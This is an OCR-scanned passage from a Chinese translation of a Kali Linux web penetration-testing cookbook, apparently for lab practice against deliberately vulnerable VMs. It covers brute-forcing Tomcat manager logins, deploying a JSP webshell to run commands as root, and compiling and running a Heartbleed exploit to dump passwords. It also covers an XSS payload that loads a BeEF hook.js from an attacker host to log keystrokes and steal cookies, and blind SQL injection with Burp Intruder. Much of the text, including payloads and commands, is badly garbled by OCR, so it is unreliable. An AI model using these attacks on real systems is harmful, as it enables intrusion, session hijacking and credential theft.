7， 剩 余 参 数 刚好 适用 于 我 们 的 情况 ， 让 我 们 执行 攻击 : 


ömt at ui 
Ltomc at myi 
tomcat mii 


tomcat mgi 





在 一 些 尝试 中 失败 之 后 ， 我 们 发 现 了 有 效 的 密码 ， 它 使 用 [+] 标记 。 





工作 原理 


通常 Tomcat 使 用 TCP 8080， 它 的 管理 器 应 用 位 于 /manager/html 中 。 这 个 应 用 使 用 基本 的 
HTTP 了 验证。 我 们 刚刚 使 用 的 Metasploit 辅助 模块 ( tomcat_mgr_login ) 有 一 些 值 得 提 及 的 
配置 项 


e BLANK PASSWORDS : 对 每 个 尝试 的 用 户 添加 空 密 码 测 试 。 


e PASSWORD : 如 果 我 们 打算 测试 多 个 用 户 的 单一 密码 ， 或 者 添加 列表 中 没有 包含 的 项 目 ， 
这 就 很 实用 。 


e Pass FILE : 用 于 测试 的 密码 列表 。 
e Proxies : 如 果 我 们 需要 通过 代理 来 访问 我 们 的 目标 ， 或 者 避免 检测 ， 就 用 这 个 选项 。 


e RHOSTS :单个 主机 ， 或 多 个 (使 用 空格 分 隔 ) ， 或 者 我 们 想 要 测试 的 主机 列表 文件 
( /path/to/file/with/hosts ) ° 


e RPORT : Tomcat 所 使 用 的 TCP 端口 。 
e STOP ON SUCCESS. : 发 现 有 效 密码 之 后 停止 党 试 。 
e TARGERURI : 主机 中 管理 器 应 用 的 位 置 


e USERNAME 指定 特殊 的 用 户 名 来 测试 ， 它 可 以 被 单独 测试 ， 或 者 添加 到 定义 
在 USER FILE 的 列表 中 。 


e USER PASS FILE : 包含 要 被 测试 的 “用 户 名 密码 "组合 的 文件 。 
e USER AS PASS : 将 每 个 列表 中 的 用 户 名 作为 密码 尝试。 
j 见 
这 个 攻击 也 可 以 由 Hydra 执行 ， 使 用 http-head 作为 服务 ， -L 选项 来 加 载 用 户 列 表 ， -P 选 


项 来 加 载 密码 。 


6.10 使 用 Tomcat 官 理 颈 来 执行 代码 


第 六 草 利用 -ERE 


上 一 个 秘籍 中 ， 我 们 获得 了 Tomcat 管理 器 的 身份 认证 ， 并 提 到 了 它 可 以 让 我 们 在 服务 


BEES 来 登录 管理 器 并 上 传 新 的 应 用 ， 这 人 允许 我 们 在 服务 


行 操 作 系 统 命 令 。 


H; 
RAE y HR 
1. 1% |" http://192.168.56.102:8080/manager/html ° 


2. dig A P E de SE EB IS] o de] EM SABER P RAS] : root 和 owaspbwa ° 


Authentication Required 


Lo Ausername and password are being requested by http://182,168.56.102: 8080, The 


site says: "Torncat Manager Application" 
User Name: root 
Password: eeseesse 








| | Cancel. | | O | 


3 BRAT 管理 器 ， 了 寻找 WAR file to deploy 并 点 击 Browse 按钮 。 


4. Kali 在 /usr/share/1audanum 包含 了 一 些 webshall， 在 这 里 浏览 它们 并 选 


件 /usr/share/laudanum/jsp/cmd.war ° 


File Upload 








às P 4A 
AT 


Places Name v Sie Modified 
Q Search Bi warfiles | 05/16/2015] 


|, 49 Recently Used 





!B Mantra | «t makewar.sh 39 bytes 12/29/2013 | 


B profile 

E Desktop 
IE File System 
[= usbÜü 

i& cdrorno 














5. 加 载 之 后 点 击 Deploy ° 








Select WAR fle to upload Jusr/share/laudanum/jsp/cmd.war 


LD eploy | 


| Browse... | 
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BGEGHE-4&EUXxx 


6， 确 保存 在 新 的 叫做 cmd 的 应 用 。 





me | 1 | | Expire sessions | with idle = [30 (minutes 





crant Stop Belsad Lindepley 








zm trug B | Expire sessions | with idle = [30 — minutes 

[Set Stap Beload Lindeplay —- ET | 
idocs Temcak Documentation true a | Expire sessions. | with idia = |30 (minutes | 
= €— 7] -— b m — € [stat sta AST E peur E —— — —À91 
[examples Servlet and JSP Examples trua 


























B | | Expire sessions | with ia = 3D minutes 


7. 让 我 们 试 一 试 ， 访 问 http://192.168.56.102:8080/cmd/cmd.jsp ° 


8， 在 文本 框 中 尝试 命 令 ， 例 如 ifconfig 














k /manager x Jj p http://192 a md-ifconfig x k 








> ë- |[ 192,168.56,102:8080/cmd/cmd.jsp?emd=ifconfig 
commands with JSP 

| | Send | 

Command: ifconfig 

eth Link encap:Ethernet Huaddr 08:00:27:3f:c5:c4 


inet addr:182.168.56.102 Bcast:192.168.56.255 MMask:255,255.255.0 
inet6 addr: feB0::a00:27Tf:fe3f:c5c4/64 Scope:Link 

UP BROADCAST RUNNING MULTICAST  MTU:1500 Hetric:l 

RX packets:23797 errors:0 dropped:O averruns:O frame:O 

TX Meine errors:O dropped:O owerruns:O carrier:ü 
collisions:O txqueuelen:1000 

bytes:3296537 (3.2 MB) TX bytes: 769852778 (76.9 MB) 
Interrupt:1O Base address:Oxd320 


lo Link encap:Local Loopback 
inet addr:127.0,0.1 MMask;255.0,0.0 
inet addr: ::1/128 Scope:Host 
UP LOOPBACK RUNNING  MTU:16436 Metric:l 
RX packets:1161 errors:O dropped:O overruns:O frame: 
TX packets:1181 errors:O dropped:O overruns:O carrier:ü 
collisions:O txqueuelen:ü 
RX bytes:243369 (243,3 KB) TX bytes:243369 (243.3 KB) 


EGOQeecuse-mBew»x^ 


9. 我 们 可 以 看 到 ， 我 们 可 以 执行 命令 ， 但 是 为 了 弄 清楚 我 们 拥有 什么 用 户 和 什么 权限 ， 尝 


试 whoami 命令 。 


> Wi- |[]192.168.56.102:8080/cmd/cmd.jsp?cemd-whoami 


Commands with JSF 
| Send | 


Command: whoami 


roat 


我 们 可 以 看 到 ，Tomcat 在 这 人 台 服 务 器 中 运行 在 root 权限 下 。 这 意味 着 我 们 这 里 拥有 它 的 
全 部 控制 权 ， 并 且 能 够 执行 任何 操作 ， 例 如 创建 或 删除 用 户 ， 安 装 软 件 ， 配 置 操作 系统 , 
选项 ， 以 及 其 它 。 


工作 原理 
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一 旦 我 们 获得 了 Tomcat 管理 器 的 身份 认证 ， 攻 击 过 程 就 相当 直接 了 。 我 们 仅仅 需要 足以 让 我 
们 上 传 它 的 应 用 。Laudanum 默认 包含 在 Kali 中 ， 是 多 种 语言 和 类 型 的 webshell 的 集合 ， 包 
括 PHP ^ ASP ` ASP.NET 和 JSP。 对 渗透 测试 者 来 说 ， 什么 比 webshell 更 有 用 呢 ? 


Tomcat 能 够 接受 以 WAR (Web 应 用 归档 ) 格式 打包 的 Java Web 应 用 并 将 其 部 署 到 服务 器 
上 。 我 们 刚刚 使 用 了 这 一 特性 来 上 传 Laudanum 中 的 webshell。 在 它 上 传 和 部 署 之 后 ， 我 们 
浏览 它 并 且 通 过 执行 系统 命令 ， 我 们 发 现 我 们 拥有 这 个 系统 的 root 访问 。 


第 七 章 高 级 利用 























作者 : Gilberto N A 
IFA © ValIDETic Naje xra-Gutierrez 
L ` 
- : 飞龙 
| e. 


协 仅 : CC BY-NC-SA 4.0 


在 获得 一 些 便利 来 发 现 和 利用 漏洞 之 后 ， 我 们 现在 转向 可 能 需要 更 多 努力 的 其 他 问题 上 。 


这 一 章 中 ， 我 们 会 搜索 利用 ， 编 译 程序 ， 建 立 服务 器 以 及 破解 密码 ， 这 可 以 让 我 们 访问 敏感 
信息 ， 并 执行 服务 器 和 应 用 中 的 特权 功能 。 


7.1 在 Exploit-DB 中 搜索 Web 服务 器 的 漏洞 


我 们 偶尔 会 在 操作 系统 中 ，Web 应 用 所 使 用 的 库 中 ， 以 及 活动 服务 中 发 现 服务 器 漏洞 ， 或 者 
可 以 在 浏览 器 或 Web 代理 中 不 能 利用 的 安全 问题 。 对 于 这 些 情 况 ， 我 们 可 以 使 用 —À 
的 利用 集合 ， 或 者 如 果 我 们 要 找 的 不 在 Metasploit 里 面 ， 我 们 可 以 在 Exploit-DB 中 搜索 它 


Kali 包含 了 Exploit-DB 中 的 利用 的 离线 副本 。 这 个 秘籍 中 ， 我 们 会 使 用 Kali 自 带 的 命令 来 探 
索 这 个 数据 库 并 找到 我 们 需要 的 利用 


操作 小 


2， 输 入 下 列 命令 


searchsploit heartbleed 





3. 下 一 步 是 将 利用 复制 到 一 个 可 以 修改 的 地 方 ， 并 编译 它 ， 像 这 样 : 


mkdir heartbleed 
cd heartbleed 
cp /usr/share/exploitdb/platforms/multiple/remote/32998.c 


4. 通 第 ， 利 用 在 第 一 行 包含 一 些 自身 信息 ， 以 及 如 何 使 用 它们 ， 像 这 样 : 


head -n 30 32998.c 





5. 这里， 利用 使 用 C 编写 ， 所 以 我 们 需要 将 它 编译 来 使 用 。 编 译 命令 在 文件 中 显示 
( cc -1ssl -lssl3 -lcrypto heartbleed.c -o heartbleed ) ， 它 在 Kali 中 不 起 作用 ， 所 
以 我 们 需要 下 面 这 个 : 


gcc 32998.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto 





工作 原理 

searchsploit 命令 是 安装 在 Kali 中 的 Exploit-DB 本 地 副本 的 接口 。 它 用 于 在 利用 的 标题 和 描 
述 中 搜索 字符 串 ， 并 显示 结果 。 

利用 存在 于 /usr/share/exploitdb/platforms E] 录 中 ° searchsploit 所 展示 的 利用 目录 是 它 的 


相对 路 径 ， 这 就 是 我 们 在 复制 文件 的 时 候 使 用 完整 路 径 的 原因 。 利 用 文件 以 利用 编号 命名 ， 
在 它们 被 提交 到 Exploit-DB 时 分 配 。 


编译 步骤 和 在 源 代码 中 的 推荐 有 些 不 同 ， 因 为 OpenSSL 库 在 基于 Debian 的 发 行 版 中 ， 由 于 
它们 从 源 代 码 中 构建 的 方式 而 缺少 一 些 功能 。 


P 


监控 利用 的 影响 和 效果 极其 重要 ， 因 为 我 们 在 实时 系统 中 使 用 它 。 通 常 ，Exploit-DB 中 的 利 
用 都 值得 相信 ， 即 使 它们 通常 需要 一 些 调整 来 工作 在 特定 的 环境 中 ， 但 是 它们 中 有 一 些 不 像 
他 们 所 说 的 那样 。 出 于 这 个 原因 ， 在 站 实 世界 的 渗透 测试 中 使 用 之 天 ， 我 们 需要 检查 源 代码 
并 在 我 们 的 实验 环境 中 测试 它们 o 


5 见 
除了 Exploit-DB ( www.exploit-db.com ) ， 也 有 一 些 其 他 站 点 可 以 用 于 搜索 目标 系统 中 的 已 
知 漏洞 和 利用 : 


e http://www.securityfocus.com 

e http://www.xssed.com/ 

e https://packetstormsecurity.com/ 
e http://seclists.org/fulldisclosure/ 
e http://Oday.today/ 


7.2 利用 Heartbleed 7& 

这 个 秘籍 中 ， 我 们 会 使 用 之 前 编译 的 Heartbleed 利用 来 提取 关于 存在 漏洞 的 Bee-box 服务 器 
的 信息 ( https://192.168.56.103:8443/ ) 。 

Bee-box 虚拟 机 可 以 从 https://www.vulnhub.com/ entry/bwapp-bee-box-v16,53/ 下 载 ， 那 里 也 
有 安装 指南 。 

准备 

在 上 一 个 秘籍 中 ， 我 们 生成 了 Heartbleed 利用 的 可 执行 文件 。 我 们 现在 使 用 它 来 利用 服务 器 
的 漏洞 。 

Heartbleed 是 能 够 从 服务 器 内 存 中 提取 信息 的 漏洞 。 在 尝试 利用 来 获得 一 些 要 提取 的 信息 之 
前 ， 可 能 需要 浏览 并 向 服务 器 的 8443 端口 上 的 HTTPS 页 面 发 送 数据 。 

TEE y 3X 


1， 如 果 我 们 检查 Bee-Box 的 8443 端口 ， 我 们 会 发 现 它 存在 Heartbleed 漏洞 。 


sslscan 192.168.56.103:8443 


N'I'R LEL 1 à 
EC 21 i| z 


LS 1.1 WE to heartbleed 





2， 现 在， 让 我 们 开始 利用 漏洞 。 手 心 ， 我 们 访问 包含 可 执行 利用 的 文件 夹 : 


cd heartbleed 


3. 之 后 我 们 检查 程序 的 选项 ， 像 这 样 : 


./heartbleed --help 





4. 我 们 要 尝试 利用 192.168.56.103 的 443 端口 ， 获 得 最 大 的 泄露 并 保存 输出 到 文本 文 


件 hb test.txt 。 


./heartbleed -s 192.168.56.103 -p 8443 -f hb test.txt -t 1 


现在 ， 如 果 


我 们 检查 hp test.txt 的 内 容 : 


cat hb test.txt 


我 们 的 利用 
的 登录 请 求 ， 


如 果 我 们 想 


strings h 


2,117171 7 1 7 E 





从 HTTPS 服务 器 中 提取 了 信息 ， 从 这 里 我 们 可 以 看 到 会 话 OD 甚至 还 
包括 纯 文本 用 户 名 和 密码 。 

有 要 跳 过 所 有 的 二 进 制 数据 ， 只 查看 文件 中 的 可 读 文 本 ， 使 用 strings 

b test.txt 








工作 原理 


我 们 在 第 四 章 中 提 到 过 ，Heartbleed 漏洞 允许 攻击 者 从 OpenSSL 服务 器 内 存 中 以 纯 文 本 读 
取信 息 ， 这 意味 着 我 们 不 需要 解密 甚至 是 解释 任何 客户 端 和 服务 端 之 间 的 通信 ， 我 们 只 需 简 
单 地 向 服务 器 请 求 内 存 中 的 东西 ， 它 会 回应 未 加 密 的 信息 。 


这 个 秘籍 中 ， 我 们 使 用 了 可 公共 访问 的 利用 来 执行 攻击 ， 并 获取 到 至 少 一 个 有 效 的 会 话 ID。 
有 的 时 候 还 可 能 在 Heartbleed 的 转 储 中 找到 密码 或 其 它 敏 感 信息 。 


最 后 ， strings 命令 只 展示 文件 中 的 字符 串 ， 跳 过 所 有 特殊 字符 ， 使 其 更 加 易 读 。 


7.3 使 用 BeEF 利用 XSS 
BeEF， 即 浏览 器 利用 框架 ， 是 个 专注 于 客户 端 攻击 向 量 的 框 梁 ， 特 别 是 Web 浏览 器 的 攻 
Ho 


这 个 秘籍 中 ， 我 们 会 利用 XSS 漏洞 并 使 用 BeEF 来 控制 客户 端 浏览 器 。 
准备 

在 开始 之 前 ， 我 们 需要 确保 启动 了 BeEF 服务 ， 并 且 能 够 访 

问 http://127.0.0.1:3000/ui/panel (使 用 beef/beef 身份 标识 ) ° 


1. Kali 的 默认 BeEF 服务 不 能 工作 。 上 所 以 我 们 不 能 仅仅 运行 beef-xss 让 它 尼 动 。 我 们 需要 
从 安装 目录 中 局 动 它 ， 像 这 样 : 


cd /usr/share/beef -xss/ 
./ beef 





2. IE > x 


TETTE JE 


1. BeEF 需要 客户 端 浏 览 器 调用 hook.js 文件 ， 这 用 于 将 浏览 器 勾 到 我 们 的 BeEF 服务 器 


M 
Hn, 


http://127.0.0.1:3000/ui/panel 并 使 用 beef 作为 用 户 名 和 密码 。 如 果 有 
效 ， 我 们 就 准备 好 了 。 


aa 


我 们 会 使 用 一 个 存在 XSS 漏洞 的 应 用 来 使 用 户 调 用 它 。 为 了 尝试 简单 的 XSS DUX ^ 3] 


Dj http://192.168.56.102/bodgeit/search.jsp?q-?63Cscript?ó3bEalert9628 1962996$3C962Fscript9?63E 


Oo 


? 


2. 这 就 是 和 存在 XSS 漏洞 的 应 用 ， 所 以 现在 我 们 需要 修改 脚本 来 调用 hook.js 。 想 象 一 下 你 


就 是 受害 者 ， 


A TETE 56. Te srcz"http://192.168.56.1:3000/hoc 


链接 的 邮件 ， 你 打 彰 浏览 器 它 来 看 看 ， 像 这 


你 尔 已 经 收 到 了 e, 


& The Badgelt Stare 


Po -Heyy T 


有 一 


m 
[| 


E 


k d 


192.168.55.102 


The Bodgelt Store 


Search 
You searched for: 


Ha Resulls Found 


现在 ， 在 BeEF 面板 中 ， 攻 击 者 会 看 到 新 的 在 线 浏览 器 。 


4. 攻击 者 的 最 住 步 骤 就 是 生成 一 些 持久 的 ， 至 少 在 用 户 浏览 期 间 有 效 。 访 问 攻 击 者 浏览 器 
AJ command 标签 页 ， 从 这 里 选择 Persistence | Man-In-The-Browser 之 后 P Execute ? 
执行 之 后 > 选择 Module Results History 中 的 相关 命 令 来 检查 结果 ， 像 这 


Bes tonmrol Panel w^ 
OQ é @127.0.0.1 "Na Ses tA tA 4 [] 5 » E 
E Mast Visited v 


* BEEF D35 Ts | EAE Bug | Logout 


- Haokad romeri lat Sanad Lixga Curam Brovsar 
a Brewers i 
a Cj 18 158 56.102 Demiin real st in Brod ab 


W DX su uasi 


zi Categery Breves er (7 lieri] 
LJenfine Erros 


Broeser Mame Freir iiaii 
lrageser Yersom I5 Dzi. Pa Lui 
Hrovesar DA Sring Mariss o [XIL Linu: xB& E4 6v 18 0] Gecka 20100101 Fretoxi ti D ing ak rd ri 
Hi paner Larsgpuiage. lS inia zai 
Brosserg Plazglorm: Lirsis x55, 54 inkizk--mikiri 
Urawser Magina: Shociowemes FInsti-v 11 2 202 508 Gnome Sell Inregration-y inripkzminn 
Window Sire: Widh: 917 Hana 414 bil rmi inn 


a Carga y Bi i GT | 17 Wier | 


Fishi Yh indican 
VB5eripr Ho miaon 
PheneGap: Ho rial sli 
Doogie Gears. a imisa 
Wal ochar: 12x ini | 
Duilek Tines: Ms ii 


5， 如 果 我 们 检查 浏览 器 中 的 Logs 标签 页 ， 我 们 可 能 会 看 到 BeEF 正 在 储存 用 户 关 于 用 户 在 
浏览 器 中 执行 什么 操作 的 信息 ， 例 如 输入 和 点 击 ， 我 们 可 以 在 这 里 看 到 : 


W BaF Das iach | Bubmk Bun | Logoi 
a i Online rowpart 7 i 
a c3 ag 168 58 102 Dern | Laya | Corn sinis | Fer ll X135Pay3 | kc | Mehet 


Deirg Sisried - Loga Current BüBrowser 


LIE 2 1-21  Minlule Tre Blade Besite His Toby Command remiz - 
JO Browser | [rem label 1 Sun Det 112015 23-17 31 GMT-C500 [COT 
A | uaria: Eroreezer hooked. 
[Brewer (52) ü 2015-10-1123.17 command 1 " p ADDITA CEPS PI-GIOD DCERT 
Cg Chrome Exrenaiena (6] dita: hie XN Lesen emm vira 
Cj Denug (Ca 
i] Expinits (74) 
(Pinar (21) 
[rec im 
ep (1) 
(Case [145 
[] erwerk | 
a —jPersisteree (4] 
| . Man ir The-Ercreiee 
i Contem Coat Tah 
ig Creane Fonegraund Frane 
db Creare Pop Under 
LPhanegap [15] 
(Satin Engineering (21) 











6. 我 们 也 可 以 通过 使 用 commands | Browser | Hooked Domain | Get Cookie 来 获取 Cookie ， 


像 这 本 





Hegia Browsers 


- being Stmted : pgs Current lrovwser 
à —jO0nine Browsers 
a 3192 15856 102 [ena Logs corr Fider xag ipes ereaork 
d ^ * m2158551 L. Type Event 

jortine Browsers pt te me p j a a a 
158 Event 12268 1975 - [Worse Click] x: 810 y-133 » td 
Lr Ewent Bh 11/s-|Facum| Browser window hae regained focus 
156 Ewent 1048 156s -]Blur| Breweger ssindowe has bost Tacug 
155 Eveni 1045 729* - |Facus| Browser window hàs regained lacus 
154 Event 104 1 5960s - [house Click] x- 786 y 340 > inpurssubmi 
i53 Ewent 1041 9658s - [Blur] Browser window has last focum 
152 Command Hacked broser WL ip. 192.158.56.1] has execured imemine Tróen command module [id 235, rime kanti Tha- 

Browser 

ISL Eveni IHAGIS = [User Typedi rd 
150 Ewent 1n38 B27& - [User Typed] sswo 
145 Ewert U36245 - [User Typed] pa 
148 Ewent 1037 R2 1s - [User Typed] 
IW Ewent 1038 BlIBs - User Typedi sword 
145 Ewent 1035.5158 = [User Typed] pas 
w5 Eremi 1n34 B1?* - [Usar Typed] com 
144 Eveni 106313 Bis - [User Typed} mail 
143 Ewent WaZ BUrs - [User Typed] i 
HZ Ewent 1316942 - [User Typedi r 
141 Ewent 1x30 B0 1s - [User Typedi use 
140 Ewent in28 5805s - [House Click] x: 808 y 245 > inputsusername(username) 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 了 script 标签 的 src 属性 来 调用 外 部 JS 文件 ， 这 里 是 BeEF £344 
F o 

hook.js 文件 与 服务 器 通信 ， 执 行 命令 并 返回 响应 ， 使 攻击 者 能 够 看 到 它们 。 它 在 客户 端的 
浏览 器 中 不 打印 任何 东西 ， 所 以 受害 者 通常 不 会 知道 他 的 浏览 器 正在 被 攻击 。 


在 让 受害 者 执行 我 们 的 hook 脚本 之 后 ， 我 们 使 用 持久 化 模块 Man In The Browser 使 浏览 器 
在 每 次 用 户 点 击 链接 时 ， 向 相同 域 发 送 AJAX 请 求 ， 所 以 这 个 请 求 维 持 了 钧 子 ， 也 加 载 了 新 
的 页 dn 


我 么 也 会 看 到 ，BeEF 的 日 志 记 录 了 用 户 在 页 面 上 执行 的 每 个 步骤 ， 我 们 能 够 从 中 获得 用 户 名 
和 密码 信息 。 也 可 以 用 来 获得 远程 的 会 话 Cookie， 这 可 以 让 攻击 者 劫持 受害 者 的 会 话 。 
更 多 


BeEF 拥有 很 多 功能 ， 从 判断 受害 者 所 使 用 的 浏览 器 类 型 ， 到 利用 已 知 漏洞 和 完全 攻陷 罕 户 端 
系统 。 一 些 有 趣 的 特性 是 : 


èe Social Engineering/Pretty Theft : 这 是 个 社会 工程 工具 ， 人 允许 我 们 模拟 登陆 页 面 ， 就 像 
常见 的 服务 那样 ， 例 如 Fackbook、Linkedin、YouTube 以 及 其 它 。 


© Browser/Webcam and Browser/Webcam HTML5 : 就 像 看 上 去 那样 这 两 个 模块 外 E 95 d AU 已 、 意 使 用 
许可 配置 来 激活 受害 者 的 摄像 头 ， 前 者 使 用 隐藏 的 Flash embed 标签 ， 后 者 使 用 HTML5 
IR 


: 


e Exploits folder : 这 包含 一 组 特殊 软件 和 情况 的 利用 ， 它 们 中 的 一 些 利用 服务 和 其 它 客 


户 端 浏览 器 。 


* Browser/Hooked Domain/Get Stored Credentials : 这 会 党 试 提 取 浏 览 器 中 储存 的 沦陷 域 的 
f] P deve 


e Use as Proxy : 如 果 我 们 右 击 被 匀 住 的 浏览 器 ， 我 们 会 获得 将 其 用 作 代 理 的 选项 。 这 将 
客户 端 浏览 器 用 作 代理 ， 会 给 我 们 机 会 来 探索 受害 者 的 内 部 网 络 。 


BeEF 有 许多 其 它 攻击 和 模块 ， 对 渗透 测试 者 非常 实用 ， 如 果 你 想 要 了 解 更 多 ， 你 可 以 查看 官 
方 的 Wiki : https://github.com/ beefproject/beef/wiki ° 


7.4 利用 SQL 8 7x 
在 第 六 章 中 ， 我 们 利用 了 基于 错误 的 SQL 注入 ， 现 在 我 们 使 用 Burp Suite Intruder 作为 主要 
工具 来 识别 和 利用 SQL 8E 
准备 
使 浏览 器 将 Burp Suite 用 作 代 理 。 
操作 步骤 
1. 浏览 nttp://192.168.56.102/WebGoat ， 实 用 webgoat 作为 用 户 名 和 考 码 登录 。 
2. "Ad: start WebGoat 来 访问 WebGoat 的 主页 。 


3. WI Injection Flaws | Blind Numeric SQL Injection ? 


4. 页 面 上 说 ， 练 习 的 目标 是 找到 给 定 字 段 在 给 定 行 中 的 值 。 我 们 的 做 事 方式 有 一 点 不 同 ， 
但 是 让 我 们 看 看 它 如 何 工 作 : 将 101 作为 账户 号 码 ， 并 点 击 go e 


Put the discovered pin value in the form to pass the lesson. 


Enter your Account Number: |101 Go! 





Account number is valid. 


5， 现 在 尝试 1011 ° 


Enter your Account Number: |1O11 C30! 


Invalid account number. 


到 目前 为 止 ， 我 们 看 到 了 应 用 的 行为 ， 它 仅仅 告诉 我 们 账户 号 码 是 否 有 效 。 


10. 


11. 


12. 


让 我 们 尝试 注入 ， 因 为 它 查 找 号 码 ， 可 能 将 它们 用 作 整 数 。 我 们 在 测试 中 不 使 用 单 引 


> 所 以 提交 101 and 1=1 























Enter your Account Number: 101 and 1-21 | Go! | 


Account number is valid. 


现在 尝试 101 and 1-2 ° 


























Enter your Account Number: 101 and 1-22 | Go! 
Invalid account number. 
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现 Invalid account number 信息 。 


在 这 个 秘籍 中 ， 我 们 要 获得 连接 到 数据 库 的 用 户 名 称 。 所 以 我 们 首先 需要 知道 用 户 名 称 
的 长 度 。 让 我 们 尝试 一 下 ， 注 入 101 AND 1=char_length(current user) ° 


下 一 步 是 在 BurpSuite 的 代理 中 寻找 最 后 一 个 请 求 ， 并 将 它 发 送 到 intruder 中 ， 像 这 





œ a Host | |Mathad | LIRL | m |Params | Ëdted  |Status Length |MIME type | Extension | Titia 

5 http:/192.168.56.102 GET N'ebGoat/javascnptilessanivav.js LJ L] 304 266 script js 

百 http:ii192.158.55.102 GET MNiabGoat/jsvascnpt/makewindow s Lj E 3ga Z57 script js 

| a bänn Pacem Hac 1657 CET iah ant [PT L4 i i ET 1 = * j 1 = à E ki 
E = ~- -—" e wo F d iT. T au [LL a - um = - - aut "ud ju. s" ndi dens ay À n. == =T -— w^ == z3 - -- m7 Bs E 












POST /webüoat/attack?Screensdü&menusllOO HTTP/1.1 E 
Hast: 192.168.585.102 A P 





User-Agent: Mozilla/5.O0 (X11; Linux xB6 54; rvilB.O0] Gacki Sani E SUME 
Accept: text/html, applicatisn/xhtmle xmL, application; xml;q Te 
Accept - Language ;: en-Lis, enr 日 = =0.5 
Accapt Encoding: gzip, deflate " 
Referer: http://192,158.55.102/WebOoat/attack?Screen-dumem M UR 
Caakia: BEEFHOOK -LbQE2AmE 3kYi 1 JcoOwalJwltrnPSNTLSJagsSis4CcOd Sand bo Repeater Etrl+ | 
JSESSIONID-BB2040AAAFTBDCCBB3ATBEECFZSS4EFC; acopendivids4 Sand po Seguencer Lthpersist-nada 
Authorization: Basic dzwizzShdDp3z2wJnbzro 
Connectlaon; keep-alive 

Cantant:.Type: application/x-www farm: urlancoded 





Sand to Comparer | 
Send ta Decader 


Content-Length: 6&9 Shaw response in browser | 
Reguest ir browser E| d 
account number-zloleANMDeIw3Dchar length*&aecurrent usertzo&4 5E REGIE ING VETUS! : | r 
r x 十 | = | E De g segnch tT Copy URL | 0 matches 





— 98 A i 8| intruder， 我 们 可 以 清楚 所 有 载荷 标记 ， 并 在 AND 后 面 的 1 中 添加 新 的 ， 像 


account_number=101+AND+ 国 (30char_ length*28current user*29&SUBMIT-60*21 
访问 载 衔 部 分 并 将 Payload type 设 为 Numbers ° 


将 Payload type 设 为 sequential ， 从 1 到 15， 步 长 为 1。 


156 


Payload set: [1 wj Payload count: 15 


Payload type: | Numbers v] À Request count: 15 


Payload Options [Numbers] 
This payload type generates numeric payloads within a gwen range and in a specified format, 


Number range 


Type: (€ Sequential O Random 
From: 1 
To: 15 


SLep: 





13. 为 了 看 看 响应 是 否 满 足 要 求 ， 访 问 Intruder's options ， 清 除 GrepMatch 列表 并 添 


加 Invalid account number ， 以 及 Account number is valid ° 


[2| Grep - Match 
四 These settings can be used to flag result items containing specified expressions. 


过 


Flag result items with responses matching these expressions: 





| Paste | 
| Load... | 


Invalid account number. 





























我 们 需要 在 每 个 intruder 的 标签 页 中 这 样 修改 。 


14. 为 了 使 应 用 上 自动化， 在 Redirections 中 选择 Always ， 并 在 Redirections 中 选 


择 Process cookies ? 


(2?) Redirections 


m These settings control how Burp handles redirections when performing attacks, 


Follow redirections; Q) Never 
O On-site only 
O In-scope only 
(€) Always 


[V] Process cookies in redirections 


我 们 需要 在 每 个 intruder 的 标签 页 中 这 样 修改 。 


15， 开 始 攻 击 


157 


器 
= 
L 
g 
El 
g 


它 找到 了 号 码 为 2 的 有 效 响应 ， 这 意味 着 用 户 名 只 含有 两 个 字 笠 


我 们 选择 b 作为 第 一 个 





现在 ， 我 们 打算 猜测 用 户 名 的 每 个 字符 ， 从 第 一 个 字符 开始 。 在 应 用 中 提交 下 列 代 


101 AND 1-(current user LIKE 'b96') 
' 让 BurpSuite 来 获取 请 求 ， 它 应 该 为 任意 字符 。 


同样 ， 我 们 将 请 求 发 送 给 intruder 并 保留 唯一 的 载荷 标记 b ， 


Content-Type: application/x-www-form-urlencoded 


Content-Length: 31 


(g] Payload Options [Simple list] 


account number-101 AND 1=(current user LIKE ' BbS5s' ) &SUBMIT=Go%21 
A11] 89] UAE EL E808 PUR US PR ACECRARSQPDR (从 a 到 zZ 以 及 A 到 2Z) 。 


Payload set: [go 
Payload type: | Simple list je) 


Payload count: 52 


Request count: 52 


This payload type lets you configure a simple list of strings that are used as payloads. 





在 intruder 中 重复 步骤 13 到 14 并 开始 攻击 ， 像 这 样 : 




















|Error | Redire.,. | Timeout | Length 


qp a M  — M —————Àá I 





[JEJE 
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156524 
29624 
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15624 





| 29624 
29624 
29624 
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| Invalid account ... | Account number is valid. | Ci. | 
ooo o o o o7 7s 7 7  — —— | EI 


HEDE 
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[JEJE] 


20. 现在 ， 我 们 需要 找到 名 称 的 第 二 个 单词 ， 所 以 我 们 提交 101 AND 1-(current user-'Sa') 到 
应 用 的 文本 框 ， 并 发 送 请 求 给 intruder ° 


21， 现 在 我 们 的 载荷 标记 是 s 后 面 的 a ， 换 名 话说 ， 名 称 的 第 二 个 字符 。 


account number=101+AND+1%3Cm28current user*30*&275888*27«29&SUBMIT-Go*21 


22. 重复 步骤 18 到 119。 在 我 们 的 例子 中 ， 我 们 只 使 用 了 俩 表 中 的 大 写字 母 ， 因 为 如 果 第 一 
EARE 的 ， 两 个 单词 就 很 可 能 都 是 大 写 的 。 











| Filter: Showing all iterms | Z| 
Request a|Payload Status Error — |Redire.., Timeout Length invalid... | Accou... Cornment P 
ü = 200 L] o L] 29618 ri LI baseline request . 
d A | 200 -加 fi Py j 29i 619 = IM i 
z B 200 Lj uU E 28518 ri L 
3 E 200 Ls] o L-] 28618 iv = 
4 D 200 e 0 .] 25618 Wi 
E EE i ^na qe = 


名 称 的 第 二 个 单词 是 A ， 所 以 应 用 用 于 执行 查询 的 数据 库 用 户 是 SA 9 sa 在 MSSQL 
数据 库 中 的 意思 是 系统 管理 员 。 


工作 原理 


利用 SQL 讶 注 比 起 基于 错误 的 注入 窗 费 更 多 精力 和 时 间 。 在 这 个 秘籍 中 我 们 看 到 了 如 何 获 取 
连接 到 数据 库 的 用 户 名 ， 而 在 第 六 章 的 SQL 注入 利用 汇总 ， 我 们 使 用 了 一 条 命令 来 获取 它 。 


我 们 可 以 使 用 字典 来 查看 当前 用 户 是 否 在 名 称 列表 中 ， 但 是 如 果 名 称 不 在 列表 中 ， 会 花费 更 
多 时 间 。 


我 们 最 开始 识别 了 漏洞 ， 所 显示 的 信息 告诉 我 们 我 们 的 请 求 是 瘟 是 假 。 


一 旦 我 们 知道 存在 注入 ， 并 且 正 面 的 响应 是 什么 样子 ， 我 们 开始 询问 当前 用 户 的 长 度 ， 询 问 
